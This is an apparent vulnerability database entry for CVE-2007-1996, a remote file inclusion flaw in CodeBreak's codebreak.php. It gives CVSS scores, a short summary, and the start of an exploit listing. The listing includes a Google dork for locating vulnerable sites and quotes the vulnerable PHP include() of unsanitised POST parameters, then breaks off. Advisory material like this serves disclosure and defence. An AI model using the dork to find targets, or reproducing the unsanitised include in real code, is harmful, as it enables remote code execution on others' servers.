6.8
CVSSv2

CVE-2007-1996

Published: 12/04/2007 Updated: 16/10/2018
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in codebreak.php in CodeBreak, probably 1.1.2 and previous versions, allows remote malicious users to execute arbitrary PHP code via a URL in the process_method parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

codebreak codebreak

Exploits

<!-- CodeBreak (codebreakphp process_method) - Remote File Inclusion Vulnerability Google d0rk: intitle:"CodeBreak - Hidden Morse Code" Vulnerable Code: include($_POST["process_method"] "_" $_POST["output_method"] "inc"); John Martinelli john@martinellicom john-martinellicom April 11th, 2007 !--> <html> <head& ...